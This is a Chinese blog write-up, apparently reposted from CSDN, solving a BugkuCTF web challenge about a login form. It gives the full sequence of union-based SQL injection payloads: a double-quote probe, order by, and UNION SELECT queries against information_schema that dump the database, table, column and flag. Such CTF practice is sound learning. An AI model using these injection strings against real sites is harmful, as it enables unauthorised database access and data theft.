BugkuCTF之web题之这是一个神奇的登陆框

BugkuCTF之web题之这是一个神奇的登陆框

打开网页之后发现:
在这里插入图片描述
随便输入账号和密码出现:
在这里插入图片描述
那就开始寻找注入点吧,输入0’发现还是:
在这里插入图片描述
输入0" 发现报错:
在这里插入图片描述
确定可以注入,判断字段有多少个 0"order by 1,2,3# 发现:
在这里插入图片描述
说明有两列。

输入 0" union select database(),2# ,得到库名:
在这里插入图片描述
继续输入 0" union select table_name,2 from information_schema.tables where table_schema=‘bugkusql1’ # 得到表名:
在这里插入图片描述
继续输入 0" union select column_name,2 from information_schema.columns where table_name=‘flag1’ # 得到列名:
在这里插入图片描述
继续输入 0" union select flag1,2 from flag1# 得到该列下的值:
在这里插入图片描述
看起来挺像flag的,那么提交一下吧,发现这个真的是flag!!!

猜你喜欢

转载自blog.csdn.net/qq_42967398/article/details/84930265
今日推荐